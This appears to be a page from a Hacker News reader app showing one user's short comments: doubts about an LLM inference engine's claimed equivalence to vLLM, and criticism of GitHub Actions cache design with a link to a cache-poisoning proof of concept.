https://nicot.us
Why do they need to run benchmarks to confirm performance? Can't they run an example prompt and verify they get the exact same output token probabilities for all prompts? The fact that they are not doing this makes me suspicious that they are in fact not doing the exact same thing as vLLM.
It is also a bit weird that they are not incorporating speculative decoding, that seems like a critical performance optimization, especially for decode heavy workloads.
IMO the core of the issue is the awful Github Actions Cache design. Look at the recommendations to avoid an attack by this extremely pernicious malware proof of concept: https://github.com/AdnaneKhan/Cacheract?tab=readme-ov-file#g.... How easy is it to mess this up when designing an action?
The LLM is a cute way to carry out this vulnerability, but in fact it's very easy to get code execution and poison a cache without LLMs, for example when executing code in the context of a unit test.
This project is an enhanced reader for Ycombinator Hacker News: https://news.ycombinator.com/.
The interface also allow to comment, post and interact with the original HN platform. Credentials are stored locally and are never sent to any server, you can check the source code here: https://github.com/GabrielePicco/hacker-news-rich.
For suggestions and features requests you can write me here: gabrielepicco.github.io